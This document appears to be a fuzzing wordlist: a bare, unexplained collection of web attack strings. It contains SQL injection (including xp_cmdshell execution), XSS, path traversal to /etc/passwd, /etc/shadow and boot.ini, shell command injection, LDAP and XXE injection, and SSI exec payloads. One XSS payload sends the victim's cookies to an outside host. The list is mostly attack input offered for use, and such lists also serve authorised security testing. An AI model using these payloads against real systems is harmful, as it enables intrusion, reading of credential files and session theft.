00 0 0 or 1=1 0xfffffff 1 1.0 1;SELECT%20* 2 65536 268435455 2147483647 ! !' !@#0%^#0##018387@#0^^**(() !@#$%%^#$%#$@#$%$$@#$%^^**(() " "' or 1 --'" ") or ("a"="a "> ">xxx

yyy "\t" " or 0=0 # " or 0=0 -- " or 1=1 or ""=" " or 1=1-- " or "a"="a " or "x"="x # # #' #' #xA #xA#xD #xD #xD#xA $NULL $null % %00 %00 %00 %00../../../../../../etc/passwd %00../../../../../../etc/shadow %00/ %00/etc/passwd%00 %00/etc/shadow%00 %0a %0a/bin/cat%20/etc/passwd %0a/bin/cat%20/etc/shadow %0d%0aX-Injection-Header:%20AttackValue %01%02%03%04%0a%0d%0aADSF %01%02%03%04%0a%0d%0aADSF %2A %2A%7C %2A%28%7C%28mail%3D%2A%29%29 %2A%28%7C%28objectclass%3D%2A%29%29 %2C %2e%2e%2f %3C %3C%3F %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E %3cscript%3ealert("XSS");%3c/script%3e %3cscript%3ealert(document.cookie);%3c%2fscript%3e %5C %5C/ %7C %7C %20 %20$(sleep%2050) %20'sleep%2050' %20| %21 %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00 %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini %26 %27%20or%201=1 %28 %29 %60 %250a %2500 & < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < ' '%20OR < < <!--#exec%20cmd="/bin/cat%20/etc/passwd"--> <!--#exec%20cmd="/bin/cat%20/etc/shadow"--> <>"'%;)(&+ <script>alert(document.cookie);<script>alert <script>alert(document.cookie); ";id" ' '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E '%20or%201=1 '';!--"=&{()} ' (select top 1 ') or ('a'='a ') or ('x'='x ' -- ' ; ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//>!--=&{} '; exec master..xp_cmdshell '; exec xp_regread '> '> ' UNION ALL SELECT ' UNION SELECT 'hi' or 'x'='x'; ' or 0=0 # ' or 0=0 -- ' or 1=1 or ''=' ' or 1=1 or ''=' ' or 1=1-- ' or '1'='1'-- ' or ''=' ' or ''=' ' or 'x'='x ' or (EXISTS) ' or a=a-- 'or select * ' or uid like '% ' or uname like '% ' or userid like '% ' or user like '% ' or username like '% 'sqlattempt1 '||UTL_HTTP.REQUEST ( (') (sqlattempt2) ) * *' *' *(|(mail=*)) *(|(objectclass=*)) */* *| *| +%00 ,@variable - - -1 -1.0 -2 -20 -268435455 -- -- --'; --sp_password ..%5c ..%25%35%63 ..%255c ..%%35%63 ..%%35c ..%bg%qf ..%c0%af ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini ..%u2215 ..%u2216 ../ ../../../../../../../../../../../../boot.ini ../../../../../../../../../../../../boot.ini%00 ../../../../../../../../../../../../etc/hosts ../../../../../../../../../../../../etc/hosts%00 ../../../../../../../../../../../../etc/passwd ../../../../../../../../../../../../etc/passwd%00 ../../../../../../../../../../../../etc/shadow ../../../../../../../../../../../../etc/shadow%00 ../../../../../../../../../../../../localstart.asp ../../../../../../../../../../../../localstart.asp%00 ../../../../../../../../conf/server.xml ../../boot.ini ..\ ..\..\..\..\..\..\..\..\..\..\boot.ini ..\..\..\..\..\..\..\..\..\..\boot.ini%00 ..\..\..\..\..\..\..\..\..\..\etc\passwd ..\..\..\..\..\..\..\..\..\..\etc\passwd%00 ..\..\..\..\..\..\..\..\..\..\etc\shadow ..\..\..\..\..\..\..\..\..\..\etc\shadow%00 .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd .\\./.\\./.\\./.\\./.\\./.\\./etc/shadow / / /%00/ /%2A /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini /' /' /,%ENV,/ /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow /.../.../.../.../.../ /../../../../../../../../%2A /../../../../../../../../../../../boot.ini /../../../../../../../../../../../boot.ini%00 /../../../../../../../../../../../boot.ini%00.html /../../../../../../../../../../../boot.ini%00.jpg /../../../../../../../../../../../etc/passwd%00.html /../../../../../../../../../../../etc/passwd%00.jpg /../../../../../../../../../../etc/passwd /../../../../../../../../../../etc/passwd^^ /../../../../../../../../../../etc/shadow /../../../../../../../../../../etc/shadow^^ /../../../../../../../../bin/id| /..\../..\../..\../..\../..\../..\../boot.ini /..\../..\../..\../..\../..\../..\../etc/passwd /..\../..\../..\../..\../..\../..\../etc/shadow /./././././././././././boot.ini /./././././././././././etc/passwd /./././././././././././etc/shadow /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini // //* /boot.ini /etc/passwd /etc/shadow /index.html|id| ; ;dir ;id; ;ls -la ;netstat -a; ;read; < SCRIPT]]>alert('XSS');/SCRIPT]]> var n=0;while(true){n++;}]]> << <<< < <>"'%;)(&+ ]>&xxe; ]>&xxe; ]>&xxe; ]>&xxe; SCRIPT]]>alert('XSS');/SCRIPT]]> XSS "> ','')); phpinfo(); exit;/* < script > < / script> <IMG SRC="javascript:alert('XSS')"> ]]> = ' = -- = ; ?x= ?x=" ?x=> ?x=| @' @' @* @variable A ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x| C:/boot.ini C:/inetpub/wwwroot/global.asa C:\boot.ini C:\inetpub\wwwroot\global.asa FALSE NULL PRINT PRINT @@variable TRUE ['] ['] \ \00 \00 \00\00 \00\00\00 \0 \0 \0\0 \0\0\0 \";alert('XSS');// \"blah \' \' \..\..\..\..\..\..\..\..\..\..\boot.ini \..\..\..\..\..\..\..\..\..\..\etc\passwd \..\..\..\..\..\..\..\..\..\..\etc\passwd%00 \..\..\..\..\..\..\..\..\..\..\etc\shadow \..\..\..\..\..\..\..\..\..\..\etc\shadow%00 \\ \\'/bin/cat%20/etc/passwd\\' \\'/bin/cat%20/etc/shadow\\' \\/ \\\\* \\\\?\\ \n/bin/ls -al\n \nnetstat -a%\n \t \u003C \u003c \x3C \x3D \x3B' \x3D \x27 \x3c \x23 \x27 \x27UNION SELECT \x27\x4F\x52 SELECT * \x27\x6F\x72 SELECT * ^' ^' ` `dir` `id` admin'-- as asc bfilename char%4039%41%2b%40SELECT count(/child::node()) delete desc distinct exec sp exec xp handler having hi") or ("a"="a hi" or 1=1 -- hi" or "a"="a hi') or ('a'='a hi' or 1=1 -- hi' or 'a'='a id%00 id%00| insert like limit null or or 0=0 # or 0=0 -- or 1=1-- or%201=1 or%201=1 -- order by procedure replace select something%00html t'exec master..xp_cmdshell 'nslookup www.google.com'-- to_timestamp_tz truncate tz_offset update x' or 1=1 or 'x'='y x' or name()='username' or 'x'='y {'} {'} | | |/bin/ls -al |dir |dir| |id |id| |ls |ls -la || }